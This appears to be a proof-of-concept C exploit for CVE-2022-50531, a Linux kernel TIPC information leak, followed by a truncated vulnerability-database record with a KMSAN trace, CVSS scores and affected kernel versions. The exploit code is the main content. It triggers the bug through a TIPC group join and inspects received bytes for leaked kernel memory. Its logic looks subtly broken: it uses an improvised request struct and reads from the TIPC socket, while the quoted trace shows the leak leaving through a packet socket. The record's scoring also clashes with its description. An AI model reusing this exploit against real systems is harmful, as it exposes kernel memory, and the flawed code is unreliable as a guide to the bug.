CVE-2022-50531

/* CVE-2022-50531 PoC - Linux kernel TIPC information leak * This PoC demonstrates the uninitialized memory leak in tipc_topsrv_kern_subscr() * Compile: gcc -o poc poc.c * Run: sudo ./poc * Note: Requires CONFIG_TIPC=y and a vulnerable kernel version */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/tipc.h> #include <linux/sockios.h> int main(int argc, char *argv[]) { int sd; struct sockaddr_tipc addr; char buffer[256]; ssize_t recv_len; /* Step 1: Create a TIPC socket */ sd = socket(AF_TIPC, SOCK_SEQPACKET, 0); if (sd < 0) { perror("socket creation failed"); return 1; } printf("[+] TIPC socket created: fd=%d\n", sd); /* Step 2: Bind to a TIPC address */ memset(&addr, 0, sizeof(addr)); addr.family = AF_TIPC; addr.addrtype = TIPC_ADDR_NAME; addr.addr.name.name.type = 1234; addr.addr.name.name.instance = 5678; addr.scope = TIPC_ZONE_SCOPE; if (bind(sd, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("bind failed - TIPC module may not be loaded"); close(sd); return 1; } printf("[+] Socket bound to TIPC address\n"); /* Step 3: Trigger the vulnerability via setsockopt with TIPC_GROUP_JOIN * This triggers tipc_topsrv_kern_subscr() which has the uninitialized * usr_handle field bug */ struct { struct sockaddr_tipc group; __u32 filter; } group_req; memset(&group_req, 0, sizeof(group_req)); group_req.group.family = AF_TIPC; group_req.group.addrtype = TIPC_ADDR_NAME; group_req.group.addr.name.name.type = 1234; group_req.group.addr.name.name.instance = 0; group_req.group.scope = TIPC_CLUSTER_SCOPE; if (setsockopt(sd, SOL_TIPC, TIPC_GROUP_JOIN, &group_req, sizeof(group_req)) < 0) { perror("setsockopt TIPC_GROUP_JOIN failed"); close(sd); return 1; } printf("[+] Joined TIPC group (triggered vulnerable code path)\n"); /* Step 4: Receive the packet containing leaked uninitialized memory */ memset(buffer, 0xCC, sizeof(buffer)); /* Fill with sentinel value */ recv_len = recv(sd, buffer, sizeof(buffer), 0); if (recv_len > 0) { printf("[+] Received %zd bytes\n", recv_len); printf("[+] Checking bytes 84-87 for leaked kernel data:\n"); if (recv_len >= 88) { printf(" Bytes 84-87: %02x %02x %02x %02x\n", (unsigned char)buffer[84], (unsigned char)buffer[85], (unsigned char)buffer[86], (unsigned char)buffer[87]); if ((unsigned char)buffer[84] != 0xCC || (unsigned char)buffer[85] != 0xCC || (unsigned char)buffer[86] != 0xCC || (unsigned char)buffer[87] != 0xCC) { printf("[!] VULNERABLE: Leaked kernel data detected!\n"); } } } else { printf("[-] No data received\n"); } close(sd); return 0; }

{"cve": {"id": "CVE-2022-50531", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:37.143", "lastModified": "2026-03-17T16:59:31.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: fix an information leak in tipc_topsrv_kern_subscr\n\nUse a 8-byte write to initialize sub.usr_handle in\ntipc_topsrv_kern_subscr(), otherwise four bytes remain uninitialized\nwhen issuing setsockopt(..., SOL_TIPC, ...).\nThis resulted in an infoleak reported by KMSAN when the packet was\nreceived:\n\n =====================================================\n BUG: KMSAN: kernel-infoleak in copyout+0xbc/0x100 lib/iov_iter.c:169\n instrument_copy_to_user ./include/linux/instrumented.h:121\n copyout+0xbc/0x100 lib/iov_iter.c:169\n _copy_to_iter+0x5c0/0x20a0 lib/iov_iter.c:527\n copy_to_iter ./include/linux/uio.h:176\n simple_copy_to_iter+0x64/0xa0 net/core/datagram.c:513\n __skb_datagram_iter+0x123/0xdc0 net/core/datagram.c:419\n skb_copy_datagram_iter+0x58/0x200 net/core/datagram.c:527\n skb_copy_datagram_msg ./include/linux/skbuff.h:3903\n packet_recvmsg+0x521/0x1e70 net/packet/af_packet.c:3469\n ____sys_recvmsg+0x2c4/0x810 net/socket.c:?\n ___sys_recvmsg+0x217/0x840 net/socket.c:2743\n __sys_recvmsg net/socket.c:2773\n __do_sys_recvmsg net/socket.c:2783\n __se_sys_recvmsg net/socket.c:2780\n __x64_sys_recvmsg+0x364/0x540 net/socket.c:2780\n do_syscall_x64 arch/x86/entry/common.c:50\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd arch/x86/entry/entry_64.S:120\n\n ...\n\n Uninit was stored to memory at:\n tipc_sub_subscribe+0x42d/0xb50 net/tipc/subscr.c:156\n tipc_conn_rcv_sub+0x246/0x620 net/tipc/topsrv.c:375\n tipc_topsrv_kern_subscr+0x2e8/0x400 net/tipc/topsrv.c:579\n tipc_group_create+0x4e7/0x7d0 net/tipc/group.c:190\n tipc_sk_join+0x2a8/0x770 net/tipc/socket.c:3084\n tipc_setsockopt+0xae5/0xe40 net/tipc/socket.c:3201\n __sys_setsockopt+0x87f/0xdc0 net/socket.c:2252\n __do_sys_setsockopt net/socket.c:2263\n __se_sys_setsockopt net/socket.c:2260\n __x64_sys_setsockopt+0xe0/0x160 net/socket.c:2260\n do_syscall_x64 arch/x86/entry/common.c:50\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd arch/x86/entry/entry_64.S:120\n\n Local variable sub created at:\n tipc_topsrv_kern_subscr+0x57/0x400 net/tipc/topsrv.c:562\n tipc_group_create+0x4e7/0x7d0 net/tipc/group.c:190\n\n Bytes 84-87 of 88 are uninitialized\n Memory access of size 88 starts at ffff88801ed57cd0\n Data copied to user address 0000000020000400\n ...\n ====================================================="}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.17", "versionEndExcluding": "4.19.264", "matchCriteriaId": "09C4D37C-A518-40EC-BBAC-23AE3A97FF35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.221", "matchCriteriaId": "DF527781-6E98-4DBF-B668-377AA673CDCF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.152", "matchCriteriaId": "AFE2A429-A1A8-4B68-8F1D-A1595AB6A4F7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.76", "matchCriteriaId": "918A4953-6F82-40F5-B7A9-9836905139C1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.6", "matchCriteriaId": "98F5FA4A-A33F-4FAD-894E-FDC9D295742A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3d1b83ff7b6575a4e41283203e6b2e25ea700cd7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/567f8de358b61015dcfb8878a1f06c5369a45f54", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch ... (truncated)